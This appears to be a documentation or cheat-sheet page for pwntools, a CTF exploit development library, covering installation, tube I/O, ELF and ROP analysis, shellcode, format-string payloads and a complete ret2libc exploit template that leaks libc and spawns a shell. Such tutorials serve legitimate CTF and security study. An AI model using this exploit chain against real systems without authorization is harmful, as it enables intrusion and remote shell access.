Description
pwntools is a CTF framework and exploit development library. It provides everything needed for rapid exploit prototyping: process interaction, remote connections, binary analysis, ROP chains, shellcode, and more.
Installation
BASH
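# Install into the interpreter you will actually run exploits with
# (python3 -m pip avoids picking up a stray `pip` from another Python).
python3 -m pip install pwntools
# With all extras. The extras spec is quoted because `[all]` is a glob in zsh
# and fails with "no matches found" when left bare.
python3 -m pip install 'pwntools[all]'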
Basic Usage
PYTHON
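from pwn import *
# Packing helpers. The width is explicit in the name; endianness and word
# size for the generic pack()/unpack() come from `context`, so set
# context.binary (or context.arch) before building payloads for a target.
p64(0xdeadbeef)  # Pack 64-bit -> 8 bytes
u64(data)        # Unpack 64-bit; `data` is a placeholder and must be exactly 8 bytes
p32(0x41414141)  # Pack 32-bit -> 4 bytes
# Pick the target once. `args.REMOTE` is set from the command line
# (python3 exploit.py REMOTE), so the same script works locally and remotely
# instead of opening a process and then silently overwriting the handle
# with a remote connection.
if args.REMOTE:
    p = remote('target.com', 1337)
else:
    p = process('./binary')
# Send/receive - tube I/O is bytes, not str
p.sendline(b'hello')
response = p.recvline()  # blocks until b'\n'; pass timeout= to avoid hanging on a dead target
# Interactive shell: hands the tube to your terminal until EOF
p.interactive()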
Advanced Usage
PYTHON
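from pwn import *
# context.binary loads the ELF once and sets arch/bits/endianness/OS for
# p64/asm/shellcraft/ROP; reuse that object rather than parsing the file again.
context.binary = './binary'
context.log_level = 'debug'  # hexdumps every byte sent/received; drop to 'info' once the exploit is stable
# ELF analysis
elf = context.binary
elf.symbols['main']  # Address of main (present only if the binary is not stripped)
elf.got['puts']      # GOT entry (the slot that holds the resolved libc address)
elf.plt['system']    # PLT entry - KeyError unless the binary actually imports system
# ROP chains - gadgets come from `elf` only; rop.chain() gives the bytes, rop.dump() a readable listing
rop = ROP(elf)
rop.call('puts', [elf.got['puts']])  # leak a libc pointer
rop.call('main')                      # return to main for a second stage
# Shellcode
shellcode = asm(shellcraft.sh())               # arch/OS follow context.binary
shellcode = asm(shellcraft.amd64.linux.sh())   # explicit target
# Format string: `offset` is the printf argument index where your input lands
# on the stack; the dict maps write address -> value (placeholders here).
fmtstr_payload(offset, {target: value})
# De Bruijn patterns - the pattern must be longer than the overflow you are measuring
cyclic(200)                # Generate
cyclic_find(0x61616168)    # Find offset of the value that ended up in the crashing register
# GDB integration: needs a local process, gdb on PATH and a terminal for context.terminal
p = process(elf.path)
gdb.attach(p, 'break main')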
Common Workflows
PYTHON
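# Ret2libc exploit template (x86-64: stack overflow, NX on, no canary)
from pwn import *
context.binary = elf = ELF('./vuln')
# This must be the *target's* libc: copy it from the remote box or identify
# it from the leaked address. A different build gives wrong symbol offsets
# and the final stage silently lands in the wrong place.
libc = ELF('./libc.so.6')
p = process('./vuln')

rop = ROP(elf)
# `offset` is the distance from the start of the overflowing buffer to the
# saved return address; measure it with cyclic()/cyclic_find() (placeholder).
pop_rdi = rop.find_gadget(['pop rdi', 'ret']).address
ret = rop.find_gadget(['ret']).address  # used to re-align the stack before system()

# Stage 1: call puts(puts@GOT) to leak libc, then return to main for a second input.
rop.call('puts', [elf.got['puts']])
rop.call('main')  # requires the main symbol (unstripped binary)
payload = flat(b'A' * offset, rop.chain())
p.sendline(payload)
# Drain anything the program prints before the leak (recvuntil/recvline) or the
# 6 bytes below are not the address. A user-space x86-64 pointer fits in 6 bytes.
libc_leak = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = libc_leak - libc.symbols['puts']
# Sanity-check the leak: a glibc base is page-aligned, so low bits mean a bad
# read or the wrong libc.so.6. log.error raises, stopping before stage 2.
if libc.address & 0xfff:
    log.error('implausible libc base %#x - wrong libc.so.6 or bad leak', libc.address)
log.success('libc base: %#x', libc.address)

# Stage 2: system("/bin/sh"). The extra `ret` keeps rsp 16-byte aligned at
# the call; without it system() can crash on an aligned SSE move inside glibc.
payload = flat(b'A' * offset, ret, pop_rdi, next(libc.search(b'/bin/sh')), libc.symbols['system'])
p.sendline(payload)
p.interactive()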